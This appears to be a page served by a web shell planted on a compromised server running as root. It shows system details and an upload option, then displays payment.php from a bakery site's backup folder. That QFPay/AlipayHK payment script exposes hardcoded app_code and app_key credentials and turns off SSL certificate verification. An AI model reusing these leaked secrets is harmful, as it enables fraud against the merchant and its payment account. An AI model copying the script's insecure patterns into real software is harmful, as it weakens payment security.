HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.30
System: Linux iZj6c1151k3ad370bosnmsZ 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: root (0)
PHP: 7.4.30
Disabled: NONE
$ pwd: /var/www/html/breadsecret.com_bak20260330/AlipayHKBackend/
Upload Files
File: /var/www/html/breadsecret.com_bak20260330/AlipayHKBackend/payment.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

ob_start();
function GetRandStr($length)
{
  $str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  $len = strlen($str) - 1;
  $randstr = '';
  for ($i = 0; $i < $length; $i++) {
    $num = mt_rand(0, $len);
    $randstr .= $str[$num];
  }
  return $randstr;
}

//$url = 'https://test-openapi-hk.qfapi.com';  // for alipay wechat pay
$url = 'https://openapi-int.qfapi.com'; // for credit card
$api_type = '/trade/v1/payment';

echo "API END POINT: ";
echo $url . $api_type;

$pay_type = '802801'; 

// credit card
  // 802801	Visa / Mastercard Online Payments
// AlipayHK in-app payment 
  // 801110 Oversea Merchants
  // 801510 Hong Kong Merchants
// WeChat Pay in-app payment
  // 800210 

//$mchid = "MNxMp11FV35qQN"; //Only agents must provide this parameter

//credit card
$app_code = 'FB39698329554171A179031DCAE6EEE7';
$app_key = 'C5856334C6624CEBB1A5C7307718E93D';

// other than crdit card
//$app_code = 'FB39698329554171A179031DCAE6EEE7'; //API credentials are provided by QFPay
//$app_key = 'C5856334C6624CEBB1A5C7307718E93D'; //API credentials are provided by QFPay
$now_time = date("Y-m-d H:i:s"); //Get current date-time

$fields_string = '';
$fields = array(
  //'mchid' => urlencode($mchid),
  'pay_type' => urlencode($pay_type),
  'out_trade_no' => urlencode(GetRandStr(20)),
  'txcurrcd' => urlencode('HKD'),
  'txamt' => urlencode(5000),
  'txdtm' => $now_time
);
ksort($fields); //字典排序A-Z升序方式

echo "<br><br>Input";
echo "<pre>";
  print_r($fields);
echo "</pre>";

foreach ($fields as $key => $value) {
  $fields_string .= $key . '=' . $value . '&';
}
$fields_string = substr($fields_string, 0, strlen($fields_string) - 1);

$sign = strtoupper(md5($fields_string . $app_key));

//// Header ////
$header = array();
$header[] = 'X-QF-APPCODE: ' . $app_code;
$header[] = 'X-QF-SIGN: ' . $sign;

//Post Data
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . $api_type);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
$output = curl_exec($ch);
curl_close($ch);

$final_data = json_decode($output, true);
echo "<br><br>Output";
echo "<pre>";
  print_r($final_data); 
echo "</pre>";
ob_end_flush();
@ Telegram